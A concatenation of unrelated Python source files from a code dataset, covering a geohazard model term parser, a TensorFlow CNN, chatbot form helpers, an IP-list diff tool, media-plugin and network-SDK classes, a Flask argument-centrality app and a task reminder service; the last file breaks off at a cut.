\"\"\"Validate model units.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model.\n\n Returns:\n dict: Model units.\n \"\"\"\n units = {}\n for key in cmodel['layers'].keys():\n if 'units' in cmodel['layers'][key]:\n units[key] = cmodel['layers'][key]['units']\n else:\n raise Exception('No unit string configured for layer %s' % key)\n return units\n\n\ndef validateRefs(cmodel):\n \"\"\"Validate references for models and layers.\n\n Args:\n cmodel (dict): Sub-dictionary from config for specific model.\n\n Returns:\n tuple: (modelrefs, longrefs, shortrefs) where:\n * modelrefs: dictionary of citation information for model\n keys='longref', 'shortref'\n * shortrefs: dictionary containing short reference for each\n input layer\n * longrefs: dictionary containing full references for each\n input layer\n\n \"\"\"\n longrefs = {}\n shortrefs = {}\n modelrefs = {}\n for key in cmodel['layers'].keys():\n if 'longref' in cmodel['layers'][key]:\n longrefs[key] = cmodel['layers'][key]['longref']\n else:\n print('No longref provided for layer %s' % key)\n longrefs[key] = 'unknown'\n if 'shortref' in cmodel['layers'][key]:\n shortrefs[key] = cmodel['layers'][key]['shortref']\n else:\n print('No shortref provided for layer %s' % key)\n shortrefs[key] = 'unknown'\n try:\n modelrefs['longref'] = cmodel['longref']\n except BaseException:\n print('No model longref provided')\n modelrefs['longref'] = 'unknown'\n try:\n modelrefs['shortref'] = cmodel['shortref']\n except BaseException:\n print('No model shortref provided')\n modelrefs['shortref'] = 'unknown'\n return modelrefs, longrefs, shortrefs\n\n\ndef checkTerm(term, layers):\n \"\"\"Checks terms of equation and replaces text with machine readable\n operators\n\n Args:\n term: term from model configuration file\n layers: dictionary of file names for all input layers\n\n Returns:\n tuple: (term, tterm, timeField) where:\n * term: dictionary of verified terms for equation with keys\n corresponding to each layer name\n * tterm: any unconverted and unverified text that may cause\n expression to fail\n * timeField: if any inputs are time dependent, output is unit of\n time (e.g., 'YEAR'), otherwise, None.\n \"\"\"\n # startterm = term\n # Strip out everything that isn't: 0-9.() operators, +-/* or layer names.\n # Anything left is an unknown symbol.\n tterm = term\n # remove log, sqrt, etc.\n for op in OPERATORS:\n tterm = tterm.replace(op, '')\n # remove ShakeMap variables\n for sm_term in SM_TERMS:\n tterm = tterm.replace(sm_term, '')\n # remove layer names\n for layer in layers:\n tterm = tterm.replace(layer, '')\n # remove arithmetic operators\n tterm = re.sub(OPERATORPAT, '', tterm)\n # remove floating point numbers\n tterm = re.sub(FLOATPAT, '', tterm)\n # remove integer numbers\n tterm = re.sub(INTPAT, '', tterm)\n # remove parentheses\n tterm = re.sub('[()]*', '', tterm)\n # remove any blank spaces\n tterm = tterm.strip()\n # remove commas\n tterm = tterm.strip(',')\n # anything left *might* cause an error\n for op in OPERATORS:\n if term.find(op) > -1:\n term = term.replace(op, 'np.' + op)\n\n for sm_term in SM_GRID_TERMS:\n term = term.replace(\n sm_term,\n \"self.shakemap['%s'].getSlice(rowstart, rowend, \"\n \"colstart, colend, name='%s')\" % (sm_term, sm_term))\n\n # replace the macro MW with the magnitude value from the shakemap\n term = term.replace('MW', \"self.eventdict['magnitude']\")\n\n # term.replace('YEAR',\"self.shakemap.getEventDict()['event_time'].year\")\n # hasTime = False\n timeField = None\n for unit in ['YEAR', 'MONTH', 'DAY', 'HOUR']:\n if term.find(unit) > -1:\n term = term.replace(unit, '')\n timeField = unit\n\n for layer in layers:\n if layer == 'friction':\n term = term.replace(\n layer,\n \"np.nan_to_num(self.layerdict['%s'].getSlice(rowstart, \"\n \"rowend, colstart, colend, name='%s'))\" % (layer, layer))\n else:\n term = term.replace(\n layer,\n \"self.layerdict['%s'].getSlice(rowstart, rowend, colstart, \"\n \"colend, name='%s')\" % (layer, layer))\n return term, tterm, timeField\n","sub_path":"gfail/logisticmodel.py","file_name":"logisticmodel.py","file_ext":"py","file_size_in_byte":42305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"455722687","text":"import tensorflow as tf\nimport numpy as np\nfrom utils import getImage\n\nclass cnn:\n def __init__(self):\n self.x = tf.placeholder(tf.float32,[None,256,256,3])\n self.y_ = tf.placeholder(tf.float32,[None,2])\n self.conv_strides = [1,1,1,1]\n self.ksize = [1,2,2,1]\n self.pool_strides = [1,2,2,1]\n self.y = self.build_model()\n\n # TO-DO - Setters\n\n # Weights of the neurons\n def Weight(self,shape,dev=0.1):\n initial = tf.truncated_normal(shape,mean=0,stddev=dev)\n return tf.Variable(initial)\n\n # Bias for the layers\n def bias(self,shape,c=0.1):\n initial = tf.constant(c,shape=shape)\n return tf.Variable(initial)\n\n # Conv layer \n # x is the input\n # W is the filter / kernel of the cnn layer\n def conv2d(self,x, W, strides, padding='SAME'):\n conv = tf.nn.conv2d(x, W, strides=strides, padding=padding)\n return conv\n\n # Max Pool the output of the conv layer\n def max_pool(self,x,padding='SAME'):\n pool = tf.nn.max_pool(x, ksize=self.ksize, strides=self.pool_strides, padding=padding)\n return pool\n\n # Weights & Biases\n def set_weights_biases(self,weight_shape,bias_shape):\n W = self.Weight(weight_shape)\n b = self.bias(bias_shape)\n return W,b\n \n def build_model(self):\n x_image = tf.reshape(self.x,[-1,256,256,3])\n\n W1, b1 = self.set_weights_biases([2,2,3,32],[32])\n W2, b2 = self.set_weights_biases([2,2,32,64],[64])\n\n h_conv1 = self.conv2d(x_image,W1,self.conv_strides) + b1\n relu1 = tf.nn.relu(h_conv1)\n pool1 = self.max_pool(relu1)\n\n h_conv2 = self.conv2d(pool1,W2,self.conv_strides) + b2\n relu2 = tf.nn.relu(h_conv2)\n pool2 = self.max_pool(relu2)\n\n W3,b3 = self.set_weights_biases([64*64*64,1024],[1024]) # For fully connected layer\n pool2_flat = tf.reshape(pool2, [-1, 64*64*64])\n matmul = tf.matmul(pool2_flat, W3) + b3\n fc_layer = tf.nn.relu(matmul)\n\n W4,b4 = self.set_weights_biases([1024,2],[2]) # Last layer\n y = tf.matmul(fc_layer,W4) + b4\n return y\n \n def train(self,train_path,validation_path,steps):\n image,label = getImage(train_path)\n v_image,v_label = getImage(validation_path)\n\n image_batch, label_batch = tf.train.shuffle_batch(\n [image, label], batch_size=32,\n capacity=450,\n min_after_dequeue=150)\n \n val_image_batch, val_label_batch = tf.train.shuffle_batch(\n [v_image, v_label], batch_size=32,\n capacity=50,\n min_after_dequeue=25)\n \n cross_entropy = tf.reduce_mean(\n tf.nn.softmax_cross_entropy_with_logits_v2(labels=self.y_, logits=self.y))\n correct_prediction = tf.equal(tf.argmax(self.y,1), tf.argmax(self.y_,1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\n\n with tf.Session() as sess:\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n coord=tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess,coord=coord)\n for i in range(steps):\n train_images, train_labels = sess.run([image_batch,label_batch])\n if i%10 == 0:\n val_images, val_labels = sess.run([val_image_batch, val_label_batch])\n train_accuracy = sess.run([accuracy], feed_dict={self.x:val_images, self.y_:val_labels})\n print(\"Step : {}, Training Accuracy : {}\".format(i+1, train_accuracy[0]))\n _, loss = sess.run([train_step,cross_entropy],feed_dict={self.x:train_images, self.y_:train_labels})\n print('Step : {} , Loss : {}'.format(i+1,loss))\n\n coord.request_stop()\n coord.join(threads)\n sess.close()\n","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":3972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"586336169","text":"# functions self contained and others used to restitute formated strings\nimport styles\nimport utility as u\nimport compatible as c\n\n\ndef extract_fields_names_and_values(entities, only_names=False):\n try:\n count = len(entities)\n slot_name_list = []\n slot_value_list = []\n for index in range(count):\n newDict = {\n \"value\": entities[index][\"value\"],\n \"entity\": entities[index][\"entity\"]\n }\n if \"input_field\" in newDict[\"entity\"]:\n # it means that the entity is a field's name, a slot name\n slot_name_list.append(newDict['value'])\n else:\n # it means that the entity is field's value, a slot value\n slot_value_list.append(newDict['value'])\n if only_names:\n return slot_name_list\n else:\n return slot_name_list, slot_value_list\n except:\n print('Fail to extract the names and values for an entity')\n raise Exception\n\n\ndef get_string_from_list(my_list):\n # Formats a list into a string and restitutes it\n try:\n string = \"\"\n for e in my_list:\n if string == \"\":\n string = e\n else:\n string = f'{string}, {e}'\n return string\n except:\n print(\"Fail to get the string from a list\")\n raise Exception\n\n\ndef is_compatible(slot_value, slot):\n # Verifies the compatibility between the user input and the value type that it should have\n try:\n # if no modification is done we retun the slot_value\n text = slot_value\n value_type = slot[u.value_type]\n # list of types that we are handling\n types_list = [u.date, u.password, u.email, u.number, u.tel, u.time, u.integer, u.decimal, u.month_type]\n if value_type in types_list:\n if value_type == u.email:\n return c.verify_compatibility_email(slot_value)\n if value_type == u.password:\n return c.verify_compatibility_password(slot_value)\n if value_type == u.tel:\n return c.verify_compatibility_tel(slot_value)\n if value_type == u.date:\n return c.verify_compatibility_date(slot_value)\n if value_type == u.month_type:\n text = f'Sorry the type {u.month_type} is not supported, consequently the field {slot[u.slot_name]} cannot be completed'\n return False, text\n if value_type == u.time:\n return c.verify_compatibility_time(slot_value)\n if value_type in u.number_types_list:\n min_value = slot[u.min_value]\n max_value = slot[u.max_value]\n if value_type == u.number:\n return c.verify_compatibility_number(slot_value, min_value, max_value)\n if value_type == u.integer:\n return c.verify_compatibility_integer(slot_value, min_value, max_value)\n if value_type == u.decimal:\n precision = slot[u.precision]\n return c.verify_compatibility_decimal(slot_value, precision, min_value, max_value)\n else:\n return c.verify_compatibility_generic(slot_value)\n return True, text\n except:\n print(\"A problem occured while verifying the compatibility of the value {} for the type {}\".format(\n slot_value, value_type))\n raise Exception\n\n\ndef convert_to_int(string, tag=u.normal):\n try:\n # return a string that can be casted to int but not an int\n num_list = u.number_0_9\n special = [' ', '.', ',']\n new_string = string\n for char in string:\n if char in special:\n new_string = string.replace(char, '')\n elif char not in num_list:\n return None\n try:\n value = int(string)\n except:\n if u.DEBUG:\n print(f'The string {string} cannot be transformed in integer')\n return None\n if tag == u.year:\n if value not in range(u.min_year, u.max_year+1):\n return None\n elif tag == u.month:\n if value not in range(u.min_month, u.max_month+1):\n return None\n elif tag == u.day:\n if value not in range(u.min_day, u.max_day+1):\n return None\n elif tag == u.hour:\n if value not in range(u.min_hour, u.max_hour+1):\n return None\n elif tag == u.minute:\n if value not in range(u.min_minute, u.max_minute+1):\n return None\n return new_string\n except:\n print(f'Fail to convert the value {string} into an integer form')\n raise Exception\n\n\ndef get_pairs(slots, only_filled=False):\n try:\n string = \"\"\n text = \"{} : {}\"\n for slot in slots:\n slot_name = slot[u.slot_name]\n if slot_name != u.REQUESTED_SLOT:\n if slot[u.required]:\n slot_name = f'*{slot_name}'\n slot_value = slot[u.slot_value]\n if slot_value is not None or not only_filled:\n # we do not enter when we are searching for only completed fields (only_filled = True) and the value is None\n if string == '':\n string = f\"{string}\\t{text.format(slot_name, slot_value)}\"\n else:\n string = f\"{string}\\n\\t{text.format(slot_name, slot_value)}\"\n return string\n except:\n print(\"Fail to get the pairs\")\n raise Exception\n\n\ndef verify_presence(name, slots, only_presence=False, only_text=False):\n try:\n possible_names = []\n for slot in slots:\n slot_name = slot[u.slot_name]\n possible_names.append(slot_name)\n if name in possible_names:\n text = f\"The field {name} is present.\"\n if only_presence:\n return True\n elif only_text:\n return text\n else:\n return text, True\n alternatives = []\n for pos in possible_names:\n if name in pos:\n alternatives.append(pos)\n if len(alternatives) > 0:\n string_alt = get_string_from_list(alternatives)\n if len(alternatives) == 1:\n text = f\"The field {name} is not present but you have this alternative {string_alt}.\"\n else:\n text = f\"The field {name} is not present but you have these alternatives {string_alt}.\"\n if only_presence:\n return False\n elif only_text:\n return text\n else:\n return text, False\n sorry_style = styles.get_sorry()\n text = f\"The field {name} is not present {sorry_style}\"\n if only_presence:\n return False\n elif only_text:\n return text\n else:\n return text, False\n except:\n print(f'Fail to verify the presence of {name}')\n raise Exception\n\n\ndef get_input_fields(form_element):\n # return the list of slots containing matching of input_field name with input_value name\n # also returns the number of required camps and the total number of camps\n try:\n elems_input = form_element.find_elements_by_xpath(\".//input\")\n elems_dropdown = form_element.find_elements_by_xpath(\".//select\")\n elems_textarea = form_element.find_elements_by_xpath(\".//textarea\")\n elems = elems_input + elems_dropdown + elems_textarea\n slots = []\n for elem in elems:\n field = elem.get_attribute(u.bot_field)\n if field is not None:\n value_name = elem.get_attribute('name')\n value_type = elem.get_attribute(u.field_type)\n description = elem.get_attribute(u.field_desc)\n if not value_type:\n # the bot-type would be the same as the input type, so we avoid putting it\n value_type = elem.get_attribute('type')\n if elem.get_attribute(u.required) is not None:\n if value_type == u.month_type:\n # this type (month) is not supported so we force it to be optional\n required = False\n else:\n required = True\n else:\n required = False\n if elem.get_attribute(u.field_spelling) is not None and u.USE_SPELLING:\n spelling = True\n else:\n spelling = False\n slot = {\n u.slot_value: None, # value corresponding to a label\n u.slot_name: field.lower(), # label\n u.value_name: value_name, # name_id of the value camp for a label\n u.value_type: value_type, # type tha the value should have\n u.required: required, # is the filling of a label required or not\n u.description: description, # description/explanation of a field\n u.spelling: spelling\n }\n # in case of field with choices, we insert the list of choices\n if value_type in u.choices_type_list:\n choice_list = get_choice_list(\n value_name, value_type, form_element)\n slot[u.choice_list] = choice_list\n # in case of numbers we have to define the min, max and step\n if value_type in u.number_types_list:\n min_value = elem.get_attribute('min')\n if min_value is None:\n min_value = - float('inf')\n max_value = elem.get_attribute('max')\n if max_value is None:\n max_value = float('inf')\n if slot[u.value_type] == u.decimal:\n precision = float('inf')\n min_value = float(min_value)\n max_value = float(max_value) \n elif slot[u.value_type] in [u.integer, u.number]:\n precision = 0\n min_value = int(min_value)\n max_value = int(max_value)\n step = elem.get_attribute('step')\n if step is not None and step != u.VOID:\n step = float(step)\n precision = 0\n while step < 1:\n step *= 10\n precision += 1\n slot[u.min_value] = min_value\n slot[u.max_value] = max_value\n slot[u.precision] = precision \n # we add the slot in the list of slots\n slots.append(slot)\n #slots = [slot] + slots\n # we save the form description and title inside the requested slot\n description = form_element.get_attribute(u.bot_desc)\n title = form_element.get_attribute(u.bot_title)\n requested_slot = {\n u.slot_value: slots[0][u.slot_name],\n u.slot_name: u.REQUESTED_SLOT,\n u.description: description,\n u.title: title\n }\n slots.append(requested_slot)\n return slots\n except:\n print(\"Fail to extract the names of the form's input fields\")\n raise Exception\n\n\ndef get_choice_list(choice_name, choice_type, web_elem):\n try:\n if choice_type == u.dropdown:\n name = choice_name.lower()\n elem = web_elem.find_element_by_name(name)\n choice_list = []\n options = elem.find_elements_by_xpath(\".//option\")\n for option in options:\n choice_list.append(option.text)\n elif choice_type in [u.radio, u.checkbox]:\n name = choice_name.lower()\n elems = web_elem.find_elements_by_name(name)\n choice_list = []\n for elem in elems:\n value = elem.get_attribute(\"value\")\n choice_list.append(value)\n return choice_list\n except:\n print(f'Fail to get the list for the slot {name}')\n raise Exception\n\n\ndef get_required_string(required):\n if required:\n req = \"This field is required.\"\n else:\n req = \"This field is optional.\"\n return req\n\n\ndef is_required(element):\n # verifies if a form_element element (corresponds to an input in our case) is required or not\n value = element.get_attribute(u.required)\n if value != None:\n return True\n else:\n return False\n\n\ndef get_proposals(values):\n try:\n text = '{} - {}'\n string = ''\n first = True\n for index in range(len(values)):\n if first:\n string = text.format(index, values[index])\n first = False\n else:\n string = f'{string}\\t{text.format(index. values[index])}'\n return string\n except:\n print(f'Fail to get the proposals')\n raise Exception\n\n\ndef get_num_fields(constructs):\n try:\n slots = constructs[\"form\"][\"slots\"]\n total = 0\n required = 0\n optional = 0\n for slot in slots:\n if slot[u.slot_name] != u.REQUESTED_SLOT:\n total = total + 1\n if slot[u.required]:\n required = required + 1\n else:\n optional = optional + 1\n return total, required, optional\n except:\n print(f'Fail to get the number of fields')\n raise Exception\n\n\ndef next_char_string():\n try:\n # we add styles to the output\n next_style = styles.get_next()\n please_style = styles.get_please()\n insert_style = styles.get_insert()\n end_style = styles.get_end()\n # we set the message to be returned to the user\n string = (f'{please_style} {insert_style} the {next_style} character, remember that you can use the expression SPACE for the blank' +\n f' and the expression TERMINATE to {end_style} the spelling')\n return string\n except:\n print('Fail to get the string for asking the next character')\n raise Exception\n\n\ndef get_fuunctionalities_list():\n try:\n text_functionalities = ''\n for fun in u.functionalities_list:\n if text_functionalities == '':\n text_functionalities = f'- {fun}'\n else:\n text_functionalities = f'{text_functionalities}\\n- {fun}'\n return text_functionalities\n except:\n print('Fail to get the list of functionalities')\n raise Exception","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":14816,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"421193203","text":"import argparse\nimport csv\nimport netaddr\nimport collections\n\ndef main():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument('-o', '--old')\n\tparser.add_argument('-n', '--new')\n\tparser.add_argument('-c', '--csv')\n\targs = parser.parse_args()\n\n\tif args.old is None or args.new is None or args.csv is None:\n\t\tparser.print_help()\n\t\texit()\n\n\t# create sets of old scope and new scope\n\told = loadfile(args.old)\n\tnew = loadfile(args.new)\n\n\t# get diff between the two sets and write to file\n\t# diff is list of hosts that are present in \"new\" but NOT in \"old\"\n\t#diff = list(old.symmetric_difference(new))\n\tdiff = list(new - old)\n\tprint(\"new ips found\\n=============\\n%s\\n\" % len(diff))\n\twritefile(diff, 'diff.txt')\n\n\t# create scope map dict from given scope\n\t# csv needs to be formatted as ip address in column1 and parnter in column2\n\tscopemap = readcsv(args.csv)\n\tdictadd = {}\n\n\t# iterate through scopemap and breakout cidr addresses\n\t# make temp dict to hold breakout addresses\n\tfor key, value in scopemap.items():\n\t\ttry:\n\t\t\tip = netaddr.IPNetwork(key)\n\t\t\tiplist = list(ip)\n\t\t\tfor ip in iplist:\n\t\t\t\tdictadd.update({str(ip) : value})\n\t\texcept Exception as e:\n\t\t\t#print(e)\n\t\t\tcontinue\n\n\t# add temp dict to master scopemap\n\tscopemap.update(dictadd)\n\n\t# format csv output\n\tcsvfile = open('output.csv', 'w')\n\tcsvfile.write(\"IP Address,Partner\\n\")\n\tpartners = []\n\n\t# do dict lookup to get partner by diff'd ip\n\t# write values to csv\n\tfor ip in diff:\n\t\tcsvfile.write(\"%s,%s\\n\" % (ip, scopemap.get(ip)))\n\t\tpartners.append(scopemap.get(ip))\n\n\t# print verbose to user\n\tc = collections.Counter(partners)\n\tprint(\"Breakdown by partner\\n====================\")\n\tfor key, value in c.items():\n\t\tprint(key, value)\n\n# load file content into a set\ndef loadfile(filename):\n\twith open(filename, 'r') as csv:\n\t\treturn set(line.strip() for line in csv)\n\n# write list to a file\ndef writefile(writelist, filename):\n\twith open(filename, 'w') as diff:\n\t\tfor item in writelist:\n\t\t\tdiff.write(\"%s\\n\" % item)\n\n# read csv contents into dict\n# csv needs to be formatted as ip address in column1 and parnter in column2\ndef readcsv(filename):\n\twith open(filename,newline='') as scopefile:\n\t\treader = csv.reader(scopefile)\n\t\tnext(reader)\n\t\tresults = dict(reader)\n\t\treturn results\n\nif __name__ == \"__main__\":\n main()","sub_path":"ipdiff.py","file_name":"ipdiff.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"635315476","text":"# Copyright 2011 Joachim Basmaison, Cyril Leclerc\r\n#\r\n# This file is part of xbmc-qobuz.\r\n#\r\n# xbmc-qobuz is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, either version 3 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# xbmc-qobuz is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with xbmc-qobuz. If not, see .\r\nimport pprint\r\n\r\nimport qobuz\r\nfrom constants import *\r\nfrom flag import NodeFlag\r\nfrom node import node\r\nfrom debug import info\r\n'''\r\n NODE VIRTUAL PLAYLIST\r\n'''\r\nfrom data.virtual_playlist import cache_virtual_playlist\r\nfrom tag.playlist import TagPlaylist\r\nfrom tag.track import TagTrack\r\nfrom node_track import node_track\r\n\r\nclass node_virtual_playlist(node):\r\n\r\n def __init__(self, parent = None, parameters = None):\r\n super(node_virtual_playlist, self).__init__(parent, parameters)\r\n self.type = NodeFlag.TYPE_NODE | NodeFlag.TYPE_VIRTUAL_PLAYLIST\r\n\r\n def _build_down(self, lvl, flag = None):\r\n o = cache_virtual_playlist()\r\n data = o.get_data()\r\n o.playlist.set_label('Poom')\r\n self.set_label(o.playlist.get_label())\r\n self.set_json(data)\r\n for track in data['tracks']:\r\n c = node_track()\r\n c.set_json(track)\r\n c.set_id(track['id'])\r\n c.setLabel(track['title'])\r\n c.set_url()\r\n self.add_child(c)\r\n return True\r\n\r\n def _get_xbmc_items(self, list, lvl, flag):\r\n for c in self.childs:\r\n tag = TagTrack(c.get_json())\r\n item = tag.getXbmcItem()\r\n list.append((item.getProperty('path'), item, False))\r\n return True\r\n\r\n\r\n","sub_path":"resources/lib/qobuz/node/virtual_playlist.py","file_name":"virtual_playlist.py","file_ext":"py","file_size_in_byte":2092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"244932226","text":"from src.ga import *\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\niterations = 100\ngen_size = 100\n#points = np.array([(6, 0), (3, 1), (1, 2), (0, 3), (0, 4), (1, 5), (3, 6), (6, 7)])\npoints = rand_points(10)\nmut_rate = .1\n\n\ndef find_path():\n prev_gen = None\n for i in range(iterations):\n prev_gen, avg_len, best = get_gen(points, prev_gen, gen_size, mut_rate)\n if best is not None:\n draw_graph(best, i)\n print(\"{0} avg len: {1}\\n best len:{2}\".format(i, avg_len, evaluate(points, best)))\n\n\ndef draw_graph(ind, index):\n G = nx.Graph()\n prev = ind[0]\n nodes = dict()\n for i in range(points.shape[0]):\n nodes[i] = points[i]\n G.add_nodes_from(nodes.keys())\n for i in ind[1:]:\n p1 = int(prev)\n p2 = int(i)\n G.add_edge(p1, p2)\n prev = i\n nx.draw(G, nodes)\n plt.savefig(\"imgs/graph{0}.png\".format(index), format=\"PNG\")\n plt.clf()\n\n\n'''\np1 = rand_path(10)\np2 = rand_path(10)\nprint(p1)\nprint(p2)\nprint(get_child([p1, p2], .2))\n'''\nfind_path()\n'''\np1 = np.array([0, 1, 2, 3, 4, 5, 6, 7])\nprint(evaluate(points, p1))\n'''\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"433782718","text":"from flask import render_template, request, redirect, session, Markup\nfrom . import application\nimport pandas as pd\nfrom app.centrality import Centrality\nfrom app.svg_parse import SVGParse\n\n@application.route('/')\n@application.route('/index')\ndef index():\n return redirect('/form')\n \n@application.route('/form') \ndef my_form():\n return render_template('my-form.html') \n \n \n@application.route('/form', methods=['POST'])\ndef my_form_post():\n text = request.form['text']\n session['text_var'] = text\n return redirect('/results')\n \ndef get_ordered_nodes(node_id):\n centra = Centrality()\n node_path = centra.get_nodeset_path(node_id)\n graph = centra.get_graph(node_path)\n n_graph = centra.remove_redundant_nodes(graph)\n i_nodes = centra.get_eigen_centrality(n_graph)\n ordered_nodes = centra.sort_by_centrality(i_nodes)\n \n return ordered_nodes\n \ndef get_svg_file(node_id):\n c = Centrality()\n node_path = c.get_svg_path(node_id)\n try:\n with application.open_resource(node_path) as file:\n svg = file.read()\n except(IOError):\n print('File was not found:')\n print(node_path)\n return svg\n \ndef get_svg_file_path(node_id):\n c = Centrality()\n node_path = c.get_svg_path(node_id)\n return node_path\n \n \n@application.route('/results') \ndef render_text():\n text = session.get('text_var', None)\n d = get_ordered_nodes(text)\n df = pd.DataFrame(data=d, columns=['id', 'text'])\n df = df[::-1]\n \n print(df.head())\n df['id'] = df['id'].astype(str)\n svg_file = get_svg_file(text)\n svgp = SVGParse()\n svg = svgp.parse_svg_file(svg_file)\n svg_df = svgp.get_node_ids(svg_file)\n #print(svg_df.head())\n svg_df['aifid'] = svg_df['aifid'].astype(str)\n merged_df = df.merge(svg_df, left_on=['id'], right_on=['aifid'], how='left')\n merged_df.drop(['id', 'aifid'], axis=1, inplace=True)\n \n print(merged_df.head())\n merged_df = merged_df[['nodeid', 'text']]\n \n items = merged_df.to_html(header=False, index=False)\n \n \n \n return render_template('results.html', title=text, table=[items], svg=Markup(svg))\n \n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"281575149","text":"from a10sdk.common.A10BaseClass import A10BaseClass\n\n\nclass Oper(A10BaseClass):\n \n \"\"\"This class does not support CRUD Operations please use parent.\n\n :param last_server: {\"type\": \"string\", \"format\": \"string\"}\n :param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`\n\n \n\n \n \"\"\"\n def __init__(self, **kwargs):\n self.ERROR_MSG = \"\"\n \n self.b_key = \"oper\"\n self.DeviceProxy = \"\"\n self.last_server = \"\"\n\n for keys, value in kwargs.items():\n setattr(self,keys, value)\n\n\nclass DnsNsRecord(A10BaseClass):\n \n \"\"\"Class Description::\n Operational Status for the object dns-ns-record.\n\n Class dns-ns-record supports CRUD Operations and inherits from `common/A10BaseClass`.\n This class is the `\"PARENT\"` class for this module.`\n\n :param ns_name: {\"description\": \"Specify Domain Name\", \"format\": \"string\", \"minLength\": 1, \"oid\": \"1001\", \"optional\": false, \"maxLength\": 127, \"type\": \"string\"}\n :param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`\n\n \n\n URL for this object::\n `https:////axapi/v3/gslb/zone/{name}/service/{service_port}+{service_name}/dns-ns-record/{ns_name}/oper`.\n\n \n\n \n \"\"\"\n def __init__(self, **kwargs):\n self.ERROR_MSG = \"\"\n self.required=[]\n self.b_key = \"dns-ns-record\"\n self.a10_url=\"/axapi/v3/gslb/zone/{name}/service/{service_port}+{service_name}/dns-ns-record/{ns_name}/oper\"\n self.DeviceProxy = \"\"\n self.oper = {}\n self.ns_name = \"\"\n\n for keys, value in kwargs.items():\n setattr(self,keys, value)\n\n\n","sub_path":"a10sdk/core/gslb/gslb_zone_service_dns_ns_record_oper.py","file_name":"gslb_zone_service_dns_ns_record_oper.py","file_ext":"py","file_size_in_byte":1736,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"506949665","text":"magicNumber = 100\n'''\nAuthor: Jordan Garcia\n\nComments_\n\nLast Updated: Febuary 24, 2018\n\nPurpose: Practice with continue\n'''\n\n\nfor n in range(101):\n if n == magicNumber:\n print(\"magic number is found. It's Number \", n-1)\n break\n else:\n print(\"Let us Say there is no magic number\")","sub_path":"PersonalProjects/Learning Basics/Comments_Break.py","file_name":"Comments_Break.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"548143640","text":"\"\"\"\nCreated by anthony on 22.10.17\ntask_service\n\nif you are not sure which service should implement function\nthen implement it in it's return type service\ne.g. get all user's tasks: return type is Task -> task_service.find_all_by_user_id\n\"\"\"\nfrom config.db_config import db_session\nfrom models.task import Task\nfrom services import project_service, user_service\nfrom utils.service_utils import save, find_all, find_one_by_id\n\n\ndef find_tasks_by_title(title):\n all_tasks = find_all(Task)\n res = []\n for t in all_tasks:\n if title in t.title:\n res.append(t)\n\n return res\n\n\ndef find_task_by_id_and_user_id(task_id_value, user_id):\n task_id = int(task_id_value)\n task_by_id = find_one_by_id(task_id, Task)\n\n if task_by_id and task_by_id.get_user_id() == user_id:\n return task_by_id\n\n else:\n return None\n\n\ndef find_tasks_by_user_id(user_id_value):\n user_id = int(user_id_value)\n all_tasks = find_all(Task)\n tasks_by_user = [t for t in all_tasks if user_id == t.get_user_id()]\n return tasks_by_user\n\n\ndef find_nearest_task(user_id, project_id):\n all_tasks = find_all(Task)\n tasks_by_user_id = filter(\n lambda t: t.get_user_id() == user_id and t.get_project_id() == project_id, all_tasks)\n\n sorted_by_remind_date = sorted(\n tasks_by_user_id, key=lambda t: t.get_next_remind_date())\n\n return sorted_by_remind_date[0]\n\n\ndef create_task(update):\n # create or get user\n chat = update.message.chat\n user = user_service.create_or_get_user(chat)\n\n # create or get project\n msg_text = update.message.text\n project = project_service.create_or_get_project(msg_text, user.get_id())\n\n if project and user:\n new_task = Task(description=msg_text, user_id=user.get_id(), project_id=project.get_id())\n saved_task = save(new_task)\n\n project_service.update_nearest_task_for_project(project.get_id())\n\n return saved_task\n\n else:\n raise ValueError('Project/User could not be created')\n","sub_path":"services/task_service.py","file_name":"task_service.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"506454555","text":"import glob\nimport cv2\nimport numpy as np\nfrom task1_bbox_prediction_utils import predictBlueTSBoundingBox, predictRedTSBoundingBox, predictYellowTSBoundingBox, predictLargeRedBoundingBox, predictLargeBoundingBox\n\ndef predict_bboxes(image):\n img = np.copy(image)\n\n cannyLowerThres = 10\n cannyUpperThres = 50\n\n brown_lower = np.array([10,100,20], dtype=np.uint8)\n brown_upper = np.array([20,255,200], dtype=np.uint8)\n\n yellow_lower = np.array([20, 100, 100], dtype = np.uint8)\n yellow_upper = 